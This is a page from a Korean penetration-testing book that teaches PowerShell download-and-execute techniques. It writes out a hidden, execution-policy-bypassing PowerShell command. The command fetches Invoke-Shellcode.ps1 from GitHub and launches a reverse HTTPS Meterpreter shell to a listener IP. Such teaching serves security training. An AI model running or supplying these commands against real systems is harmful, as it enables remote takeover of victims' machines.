Page 28 -
P. 28

다음 파워셸 명령 일부를 살펴보면서 파워셸을 이해해 보자. 첫 번째 명령은 웹 서
                 버에서 파워셸 스크립트를 다운로드해 실행한다. 대개 Meterpreter 파워셸 스크립
                 트를 목표물에 다운로드해서 사용한다.


                 Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.
                 WebClient).DownloadString('[파워셸 URL]'); [파라미터]


                 예를 들어, 목표물에서 Meterpreter 셸을 실행하려면 다음 스크립트를 다운로드한다.

                     https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/
                   Invoke- -Shellcode.ps1


                 또 사용할 파라미터도 알아야 한다. 어떤 파라미터가 필요한지 알아내는 가장 쉬운
                 방법은 파워셸 스크립트의 소스 코드를 살펴보는 것이다. Mattifestation이 작성한
                 Invoke--Shellcode.ps1 파일을 열면, HTTPS 리버스 Meterpreter 셸을 호출하는
                 코드가 있다.


                 ▼  그림 1-1 Invoke - - Shellcode.ps1











                 다음은 이 모든 내용을 적용한 파워셸 명령이다.

                 Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.
                 WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/
                 PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode
                 -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 80

                 이 옵션으로 실행하면 파워셸을 쉽게 사용할 수 있다. 또 다른 예를 살펴보자.


                 공격 대상에 이미 동일한 파일을 다운로드했다고 하자. 웹 페이지를 방문해 자동으
                 로 다운로드해서 실행하기를 원치 않는다면, 다음과 같이 실행한다.





              038




         해커 플레이북 2(본문)4차.indd   38                                             2015-12-11   오후 8:44:53
   23   24   25   26   27   28   29   30   31